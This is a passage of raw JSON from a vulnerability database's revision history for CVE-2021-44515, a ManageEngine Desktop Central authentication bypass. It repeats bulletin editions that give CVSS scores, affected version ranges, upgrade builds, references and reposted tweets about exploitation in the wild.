"https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T20:25:44", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T20:25:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T20:25:44", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 14}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T20:55:33", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T20:25:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T20:55:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 15}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T20:55:43", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T20:55:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T20:55:43", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 16}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T21:25:33", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T20:55:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T21:25:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 17}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T21:25:43", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T21:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T21:25:43", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 18}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": 